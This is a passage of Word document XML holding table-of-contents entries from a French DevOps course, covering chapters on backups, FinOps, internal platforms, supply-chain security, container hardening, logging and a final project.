        <w:t>87.2 Sauvegardes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>761</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>87.3 Reprise progressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>762</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>87.4 Tester sans provoquer l'incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>763</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>87.5 Ce qui échoue le plus souvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>764</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88. FinOps : maîtriser le coût du cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>768</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88.1 Le coût suit l'architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>768</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88.2 Rendre la dépense visible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>769</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88.3 Économiser sans casser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>770</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88.4 Dimensionner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>771</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>88.5 Le rituel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>772</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89. Plateforme interne et chemins d'or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>776</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89.1 Une plateforme est un produit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>776</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89.2 Le contrat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>777</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89.3 Modèle et auto-service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>778</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89.4 Mesurer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>779</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>89.5 Organiser l'équipe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>780</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90. Sécurité de la chaîne logicielle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>784</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90.1 La chaîne et ses maillons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>784</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90.2 Inventorier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>785</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90.3 Vérifier l'origine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>785</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90.4 Appliquer une politique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>786</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>90.5 Réagir à une vulnérabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>787</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91. Durcissement des conteneurs et du cluster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>792</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91.1 Ce qu'un conteneur n'isole pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>792</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91.2 Contexte de sécurité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>793</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91.3 Images et runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>794</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91.4 Isolation réseau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>795</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91.5 Vérifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>796</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92. Journalisation, audit et conservation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>801</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92.1 Trois journaux différents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>801</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92.2 Rétention</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>802</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92.3 Protéger l'intégrité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>803</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92.4 Demandes d'accès et de suppression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>804</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>92.5 Ce qu'il faut arrêter de collecter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>805</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie VII — Mise en pratique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93. Projet final : une plateforme du commit à la production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>809</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.1 Le cahier des charges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>810</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.2 Architecture cible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>810</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.3 Jalon 1 — Une application livrable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>811</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.4 Jalon 2 — Un pipeline complet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>812</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>93.5 Jalon 3 — L'infrastructure décrite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>813</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
